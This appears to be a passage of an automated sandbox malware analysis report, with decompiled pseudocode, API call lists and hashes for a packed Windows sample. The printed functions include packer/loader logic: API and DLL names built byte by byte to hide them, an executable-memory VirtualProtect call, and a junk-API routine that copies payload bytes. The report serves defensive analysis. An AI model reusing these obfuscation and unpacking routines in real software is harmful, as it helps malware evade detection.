LoadLibraryA.KERNEL32(VirtualProtect), ref: 00403295
GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 0040330B
VirtualProtect.KERNELBASE(00000040,?), ref: 00403328

Strings

VirtualProtect, xrefs: 00403234, 00403239, 0040329B

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: AddressLibraryLoadProcProtectVirtual
String ID: VirtualProtect
API String ID: 3509694964-268857135
Opcode ID: 0aac6784193d14c7cc0717ceed4bc427bb23036bbab5feca07755715c1f424c3
Instruction ID: d164bc87d43f54f4249ade08a5093217fed062eb1001a0fcf41d15b25b46a56e
Opcode Fuzzy Hash: 0aac6784193d14c7cc0717ceed4bc427bb23036bbab5feca07755715c1f424c3
Instruction Fuzzy Hash: CF219F2068D2C0DDEB02C728AD0871A3ED657F3749F8841B99A845A2F6C3FB1159C77E

Uniqueness

Uniqueness Score: -1.00%

Function 0218B7C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0218B7EE
Module32First.KERNEL32(00000000,00000224), ref: 0218B80E

Memory Dump Source

Source File: 00000000.00000002.304747895.000000000218B000.00000040.00000800.00020000.00000000.sdmp, Offset: 0218B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_218b000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: ddc1513a6f7108b3db6474c3a72282bb850b1ddf1f408b407c33326ced246dbd
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: AFF06D322407106FD7203BB9A8CDB6A76E8AF89669F100628E642D14C0DB70EA468E61

Uniqueness

Uniqueness Score: -1.00%

Function 0040322D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040322D(void* __eax, void* __ecx) {
				long _v8;
				struct HINSTANCE__* _t4;
				int _t6;
				CHAR* _t10;

				_t10 = "VirtualProtect";
				"lProtect" = 0x33;
				"Protect" = 0x32;
				 *0x4a43b3 = 0x6c;
				 *0x4a43b2 = 0x6c;
				M004A43AB = 0x6e;
				M004A43AD = 0x6c;
				"VirtualProtect" = 0x6b;
				M004A43AC = 0x65;
				M004A43AA = 0x72;
				"rotect" = 0x2e;
				 *0x4a43b1 = 0x64;
				M004A43A9 = 0x65;
				 *0x4a43b4 = 0;
				_t4 = LoadLibraryA(_t10);
				 *0x4d4520 = _t4;
				 *0x4a43b3 = 0x65;
				M004A43A9 = 0x69;
				M004A43AC = 0x75;
				"lProtect" = 0x6c;
				M004A43AD = 0x61;
				 *0x4a43b1 = 0x6f;
				 *0x4a43b5 = 0x74;
				"VirtualProtect" = 0x56;
				 *0x4a43b4 = 0x63;
				"Protect" = 0x50;
				 *0x4a43b6 = 0;
				M004A43AB = 0x74;
				 *0x4a43b2 = 0x74;
				M004A43AA = 0x72;
				"rotect" = 0x72;
				"`ghvVirtualProtect" = GetProcAddress(_t4, _t10);
				_t6 = VirtualProtect( *0x4c6de0,  *0x4d4524, 0x40,  &_v8); // executed
				return _t6;
			}

APIs

LoadLibraryA.KERNEL32(VirtualProtect), ref: 00403295
GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 0040330B
VirtualProtect.KERNELBASE(00000040,?), ref: 00403328

Strings

VirtualProtect, xrefs: 00403234, 00403239, 0040329B

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: AddressLibraryLoadProcProtectVirtual
String ID: VirtualProtect
API String ID: 3509694964-268857135
Opcode ID: f19cd106b8e9e1fe056e3b14d61c87be6a458b11db11ee972337780273b53d72
Instruction ID: 4f726bcc0b7ca441f156d6519b2d289291c9c1f8563d871fc85f0890ade34d94
Opcode Fuzzy Hash: f19cd106b8e9e1fe056e3b14d61c87be6a458b11db11ee972337780273b53d72
Instruction Fuzzy Hash: 91219F2068D2C0DDEB02C728AD0875A3ED657F3749F8841B99A845A2F6C3FB1159C77E

Uniqueness

Uniqueness Score: -1.00%

Function 00402DC0 Relevance: 1.5, APIs: 1, Instructions: 38
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00402DC0() {
				short _t1;
				short _t2;
				short _t3;
				short _t5;
				short _t6;
				short _t7;
				short _t8;
				short _t9;
				short _t10;
				short _t11;
				short _t12;
				struct HINSTANCE__* _t13;

				_t1 = 0x6d;
				 *0x4d4528 = _t1;
				_t2 = 0x73;
				 *0x4d452a = _t2;
				_t3 = 0x33;
				 *0x4d4532 = _t3;
				 *0x4d453e = 0;
				_t5 = 0x67;
				 *0x4d4530 = _t5;
				_t6 = 0x64;
				 *0x4d4538 = _t6;
				_t7 = 0x6d;
				 *0x4d452e = _t7;
				_t8 = 0x6c;
				 *0x4d453a = _t8;
				_t9 = 0x2e;
				 *0x4d4536 = _t9;
				_t10 = 0x6c;
				 *0x4d453c = _t10;
				_t11 = 0x32;
				 *0x4d4534 = _t11;
				_t12 = 0x69;
				 *0x4d452c = _t12; // executed
				_t13 = LoadLibraryW(0x4d4528); // executed
				return _t13;
			}

0x00402dc2
0x00402dc5
0x00402dcb
0x00402dce
0x00402dd4
0x00402dd7
0x00402ddf
0x00402de5
0x00402de8
0x00402dee
0x00402df1
0x00402df7
0x00402dfa
0x00402e00
0x00402e03
0x00402e09
0x00402e0c
0x00402e12
0x00402e15
0x00402e1b
0x00402e1e
0x00402e24
0x00402e2a
0x00402e30
0x00402e36

APIs

LoadLibraryW.KERNELBASE(004D4528,00403527), ref: 00402E30

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b865b3b61fa59658cedc2d52d9281009a6dcfc292cd7476c9457ffd7a651b01c
Instruction ID: 4062d8b0785da9e0be16259661b5ecda0991ad552e948eceb29219b293c9f79b
Opcode Fuzzy Hash: b865b3b61fa59658cedc2d52d9281009a6dcfc292cd7476c9457ffd7a651b01c
Instruction Fuzzy Hash: 91F00A35699380BBF9008BE07CB5B302321AF84B11F502927D740CA5B0E2B20550871D

Uniqueness

Uniqueness Score: -1.00%

Function 00406B3C Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406B3C(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4d6270 = _t6;
				if(_t6 != 0) {
					 *0x4d6c50 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x00406b51
0x00406b57
0x00406b5e
0x00406b65
0x00406b6b
0x00406b61
0x00406b61
0x00406b61

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00406B51

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 00c33876dff1e5f3b5ef23b7f0ab734d10711cdf71de84a118055e66a76e3cd9
Instruction ID: 99ae693c65a20a79cb811ff97dc724cb3b962f2f0bff0137a59bc7281199aef0
Opcode Fuzzy Hash: 00c33876dff1e5f3b5ef23b7f0ab734d10711cdf71de84a118055e66a76e3cd9
Instruction Fuzzy Hash: 0DD05E72A503449AEB005F746C08B623BECE384795F058436F90DC6590EB74D5508508

Uniqueness

Uniqueness Score: -1.00%

Function 0040571B Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040571B() {
				void* _t1;

				_t1 = E004056A9(0); // executed
				return _t1;
			}

0x0040571d
0x00405723

APIs

__encode_pointer.LIBCMT ref: 0040571D

Part of subcall function 004056A9: TlsGetValue.KERNEL32(00000000,?,00405722,00000000,0040CDB7,004D62B0,00000000,00000314,?,00407F5A,004D62B0,Microsoft Visual C++ Runtime Library,00012010), ref: 004056BB
Part of subcall function 004056A9: TlsGetValue.KERNEL32(00000004,?,00405722,00000000,0040CDB7,004D62B0,00000000,00000314,?,00407F5A,004D62B0,Microsoft Visual C++ Runtime Library,00012010), ref: 004056D2
Part of subcall function 004056A9: RtlEncodePointer.NTDLL(00000000,?,00405722,00000000,0040CDB7,004D62B0,00000000,00000314,?,00407F5A,004D62B0,Microsoft Visual C++ Runtime Library,00012010), ref: 00405710

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 47c647e98a24245e14133eaa447270319dbb55de24eb734f5f01b58c62fe48c7
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0218B485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0218B4D6

Memory Dump Source

Source File: 00000000.00000002.304747895.000000000218B000.00000040.00000800.00020000.00000000.sdmp, Offset: 0218B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_218b000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: eaab6686064b9116e6252d34fe292ea9f50ffa60750c6f7720b83f9acd4cf123
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 2B113C79A40208EFDB01DF98C985E99BBF5AF08350F058094F9489B361D375EA90DF80

Uniqueness

Uniqueness Score: -1.00%

Function 0040332D Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040332D() {
				void* _t1;

				_t1 = LocalAlloc(0,  *0x4d4524); // executed
				 *0x4c6de0 = _t1;
				return _t1;
			}

0x00403335
0x0040333b
0x00403340

APIs

LocalAlloc.KERNELBASE(00000000,0040338D), ref: 00403335

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 94675e064349a42606815311873e9d67dce5ea1ea1911db742fd0c18245f7b4b
Instruction ID: b25ca0d1bded91fec290e0bf50ec1fd79444cf73d4103023a83e8c5d4ac4f00d
Opcode Fuzzy Hash: 94675e064349a42606815311873e9d67dce5ea1ea1911db742fd0c18245f7b4b
Instruction Fuzzy Hash: 23B012701012009FC7404F60BD14B003B60B349343F000032F30550574D7304010DB08

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040303E Relevance: 75.4, APIs: 28, Strings: 15, Instructions: 163
timefilepipeCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040303E(intOrPtr _a4) {
				void* _v6;
				struct _COORD _v8;
				long _v12;
				long _v16;
				long _v20;
				CHAR* _v24;
				void* _v40;
				struct _COMMTIMEOUTS _v44;
				struct _INPUT_RECORD _v64;
				struct _DCB _v92;
				struct _OSVERSIONINFOA _v240;
				short _v2288;
				void _v3312;
				char _v5360;
				char _v6384;
				char _v8432;
				char _v9456;
				short _v11504;
				char _v12528;
				short _v14576;
				intOrPtr _t29;
				intOrPtr _t74;
				void* _t77;
				intOrPtr* _t79;
				void* _t82;

				E00403D50(0x38ec);
				if( *0x4d4524 == 0x37) {
					_v44.ReadIntervalTimeout = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					BuildCommDCBAndTimeoutsA("mokoputamibotedomoyip",  &_v92,  &_v44);
					CreateMailslotA("Ten wicofefimetasezawefasegatonum layamawofazom migavafususetetubefuke zahovenekupifituzig", 0, 0, 0);
					GetDriveTypeA("rogenikitisecapodunivuhakajer");
					GetCurrentDirectoryW(0,  &_v2288);
					CallNamedPipeW(L"Vob", 0, 0,  &_v3312, 0,  &_v20, 0);
					MoveFileExW(L"hipuruxukulicipofedopapadusa taxotunihulamubu volazazuhetu", L"beyiyewexuxalozuhimuzupudoguj jezelarip gevicesocuzawunaticecapon", 0);
					SearchPathA(0, 0, 0, 0,  &_v9456,  &_v24);
					GetVersionExA( &_v240);
					OpenWaitableTimerA(0, 0, "kavutoyayalifewidawurufayevamuyo");
					_t79 = __imp__FindNextVolumeMountPointW;
					 *_t79(0,  &_v5360, 0, _t77, _t82);
					ReadConsoleInputA(0,  &_v64, 0,  &_v12);
					GetLogicalDriveStringsA(0,  &_v6384);
					CreateDirectoryExW(L"zipafixumenamuyilegedesoruju rabaxakegepuvatehonapecahosipami bucajajulolutelizategehijiju", L"wuyijexihizewowimerizaten", 0);
					 *_t79(0,  &_v8432, 0);
					GlobalLock(0);
					GetModuleHandleA("Bol");
					GetWindowsDirectoryW( &_v11504, 0);
					SetMailslotInfo(0, 0);
					CreateFileW(L"yopubakiyawa fejukemiguvawotedamoxijagozawiwi sosacinolatukoragesijayev zijitogeverazovexosazapexuluwi kesijumibimidisoxew", 0, 0, 0, 0, 0, 0);
					__imp__AddConsoleAliasW(0, 0, 0);
					__imp__IsProcessInJob(0, 0, 0);
					GetProcessPriorityBoost(0, 0);
					__imp__EnumCalendarInfoExA(0, 0, 0, 0);
					QueryDosDeviceW(L"zonelolurulukusodaguyago kimuwisomizijicurab lixayibepoyikufaxemilocowap suwawosufadimoxomadona",  &_v14576, 0);
					GetConsoleTitleA( &_v12528, 0);
					_v8.X = 0;
					asm("stosw");
					FillConsoleOutputAttribute(0, 0, 0, _v8,  &_v16);
					SetVolumeLabelA(0, 0);
					CompareStringW(0, 0, L"buwulefapuhu", 0, L"humikumiyoyamofi", 0);
				}
				_t29 = _a4;
				_t74 =  *0x4d60a8; // 0x40e952
				_t25 = _t29 + 0x38d6; // 0xc2478ce
				 *((char*)( *0x4c6de0 + _t29)) =  *((intOrPtr*)(_t74 + _t25));
				return _t29;
			}

0x00403046
0x00403052
0x0040305e
0x00403064
0x00403065
0x00403066
0x00403067
0x00403075
0x00403083
0x0040308e
0x0040309c
0x004030b6
0x004030c7
0x004030dc
0x004030e9
0x004030f6
0x004030fc
0x0040310b
0x00403117
0x00403125
0x00403136
0x00403145
0x00403148
0x00403153
0x00403161
0x00403169
0x0040317a
0x00403183
0x0040318c
0x00403194
0x0040319e
0x004031b1
0x004031bf
0x004031c7
0x004031ce
0x004031da
0x004031e2
0x004031f6
0x004031fd
0x004031fe
0x00403201
0x00403207
0x00403214
0x00403218

APIs

BuildCommDCBAndTimeoutsA.KERNEL32(mokoputamibotedomoyip,?,?), ref: 00403075
CreateMailslotA.KERNEL32 ref: 00403083
GetDriveTypeA.KERNEL32(rogenikitisecapodunivuhakajer), ref: 0040308E
GetCurrentDirectoryW.KERNEL32(00000000,?), ref: 0040309C
CallNamedPipeW.KERNEL32(Vob,00000000,00000000,?,00000000,?,00000000), ref: 004030B6
MoveFileExW.KERNEL32(hipuruxukulicipofedopapadusa taxotunihulamubu volazazuhetu,beyiyewexuxalozuhimuzupudoguj jezelarip gevicesocuzawunaticecapon,00000000), ref: 004030C7
SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004030DC
GetVersionExA.KERNEL32(?), ref: 004030E9
OpenWaitableTimerA.KERNEL32(00000000,00000000,kavutoyayalifewidawurufayevamuyo), ref: 004030F6
FindNextVolumeMountPointW.KERNEL32 ref: 0040310B
ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00403117
GetLogicalDriveStringsA.KERNEL32 ref: 00403125
CreateDirectoryExW.KERNEL32(zipafixumenamuyilegedesoruju rabaxakegepuvatehonapecahosipami bucajajulolutelizategehijiju,wuyijexihizewowimerizaten,00000000), ref: 00403136
FindNextVolumeMountPointW.KERNEL32 ref: 00403145
GlobalLock.KERNEL32 ref: 00403148
GetModuleHandleA.KERNEL32(Bol), ref: 00403153
GetWindowsDirectoryW.KERNEL32(?,00000000), ref: 00403161
SetMailslotInfo.KERNEL32 ref: 00403169
CreateFileW.KERNEL32(yopubakiyawa fejukemiguvawotedamoxijagozawiwi sosacinolatukoragesijayev zijitogeverazovexosazapexuluwi kesijumibimidisoxew,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040317A
AddConsoleAliasW.KERNEL32(00000000,00000000,00000000), ref: 00403183
IsProcessInJob.KERNEL32(00000000,00000000,00000000), ref: 0040318C
GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 00403194
EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040319E
QueryDosDeviceW.KERNEL32(zonelolurulukusodaguyago kimuwisomizijicurab lixayibepoyikufaxemilocowap suwawosufadimoxomadona,?,00000000), ref: 004031B1
GetConsoleTitleA.KERNEL32(?,00000000), ref: 004031BF
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000000,?,?), ref: 004031DA
SetVolumeLabelA.KERNEL32(00000000,00000000), ref: 004031E2
CompareStringW.KERNEL32(00000000,00000000,buwulefapuhu,00000000,humikumiyoyamofi,00000000), ref: 004031F6

Strings

kavutoyayalifewidawurufayevamuyo, xrefs: 004030EF
yopubakiyawa fejukemiguvawotedamoxijagozawiwi sosacinolatukoragesijayev zijitogeverazovexosazapexuluwi kesijumibimidisoxew, xrefs: 00403175
zipafixumenamuyilegedesoruju rabaxakegepuvatehonapecahosipami bucajajulolutelizategehijiju, xrefs: 00403131
Vob, xrefs: 004030B1
humikumiyoyamofi, xrefs: 004031E9
hipuruxukulicipofedopapadusa taxotunihulamubu volazazuhetu, xrefs: 004030C2
Ten wicofefimetasezawefasegatonum layamawofazom migavafususetetubefuke zahovenekupifituzig, xrefs: 0040307E
wuyijexihizewowimerizaten, xrefs: 0040312C
beyiyewexuxalozuhimuzupudoguj jezelarip gevicesocuzawunaticecapon, xrefs: 004030BD
buwulefapuhu, xrefs: 004031EF
R@, xrefs: 00403201
mokoputamibotedomoyip, xrefs: 00403070
Bol, xrefs: 0040314E
zonelolurulukusodaguyago kimuwisomizijicurab lixayibepoyikufaxemilocowap suwawosufadimoxomadona, xrefs: 004031AC
rogenikitisecapodunivuhakajer, xrefs: 00403089

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: Console$CreateDirectoryVolume$DriveFileFindInfoMailslotMountNextPointProcess$AliasAttributeBoostBuildCalendarCallCommCompareCurrentDeviceEnumFillGlobalHandleInputLabelLockLogicalModuleMoveNamedOpenOutputPathPipePriorityQueryReadSearchStringStringsTimeoutsTimerTitleTypeVersionWaitableWindows
String ID: Bol$R@$Ten wicofefimetasezawefasegatonum layamawofazom migavafususetetubefuke zahovenekupifituzig$Vob$beyiyewexuxalozuhimuzupudoguj jezelarip gevicesocuzawunaticecapon$buwulefapuhu$hipuruxukulicipofedopapadusa taxotunihulamubu volazazuhetu$humikumiyoyamofi$kavutoyayalifewidawurufayevamuyo$mokoputamibotedomoyip$rogenikitisecapodunivuhakajer$wuyijexihizewowimerizaten$yopubakiyawa fejukemiguvawotedamoxijagozawiwi sosacinolatukoragesijayev zijitogeverazovexosazapexuluwi kesijumibimidisoxew$zipafixumenamuyilegedesoruju rabaxakegepuvatehonapecahosipami bucajajulolutelizategehijiju$zonelolurulukusodaguyago kimuwisomizijicurab lixayibepoyikufaxemilocowap suwawosufadimoxomadona
API String ID: 1735970684-4236796830
Opcode ID: e0df0ce09fda9b2ef7ece0e101d17a63f8667c0a18b9f963e9f3a0a95bfb32b5
Instruction ID: deffa83cee1144c3f376af61a7bba5fe7062f9a37bd42bf5ab91e3f7aff54741
Opcode Fuzzy Hash: e0df0ce09fda9b2ef7ece0e101d17a63f8667c0a18b9f963e9f3a0a95bfb32b5
Instruction Fuzzy Hash: BD51E772502168BBD721ABA1EE4CDDF7FACEF4A391B004062F64AF1460D6345685CBB9

Uniqueness

Uniqueness Score: -1.00%

Function 004081E1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E004081E1(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x4a3fb0; // 0x23ecf496
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x4d6828 = _t6;
				 *0x4d6824 = _t22;
				 *0x4d6820 = _t25;
				 *0x4d681c = _t21;
				 *0x4d6818 = _t27;
				 *0x4d6814 = _t26;
				 *0x4d6840 = ss;
				 *0x4d6834 = cs;
				 *0x4d6810 = ds;
				 *0x4d680c = es;
				 *0x4d6808 = fs;
				 *0x4d6804 = gs;
				asm("pushfd");
				_pop( *0x4d6838);
				 *0x4d682c =  *_t31;
				 *0x4d6830 = _v0;
				 *0x4d683c =  &_a4;
				 *0x4d6778 = 0x10001;
				_t11 =  *0x4d6830; // 0x0
				 *0x4d672c = _t11;
				 *0x4d6720 = 0xc0000409;
				 *0x4d6724 = 1;
				_t12 =  *0x4a3fb0; // 0x23ecf496
				_v812 = _t12;
				_t13 =  *0x4a3fb4; // 0xdc130b69
				_v808 = _t13;
				 *0x4d6770 = IsDebuggerPresent();
				_push(1);
				E0040B6FB(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(" gM");
				if( *0x4d6770 == 0) {
					_push(1);
					E0040B6FB(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x004081e1
0x004081e1
0x004081e1
0x004081e1
0x004081e1
0x004081e1
0x004081e1
0x004081e7
0x004081e9
0x004081e9
0x0040d040
0x0040d045
0x0040d04b
0x0040d051
0x0040d057
0x0040d05d
0x0040d063
0x0040d06a
0x0040d071
0x0040d078
0x0040d07f
0x0040d086
0x0040d08d
0x0040d08e
0x0040d097
0x0040d09f
0x0040d0a7
0x0040d0b2
0x0040d0bc
0x0040d0c1
0x0040d0c6
0x0040d0d0
0x0040d0da
0x0040d0df
0x0040d0e5
0x0040d0ea
0x0040d0f6
0x0040d0fb
0x0040d0fd
0x0040d105
0x0040d110
0x0040d11d
0x0040d11f
0x0040d121
0x0040d126
0x0040d13a

APIs

IsDebuggerPresent.KERNEL32 ref: 0040D0F0
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D105
UnhandledExceptionFilter.KERNEL32( gM), ref: 0040D110
GetCurrentProcess.KERNEL32(C0000409), ref: 0040D12C
TerminateProcess.KERNEL32(00000000), ref: 0040D133

Strings

gM, xrefs: 0040D10B

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
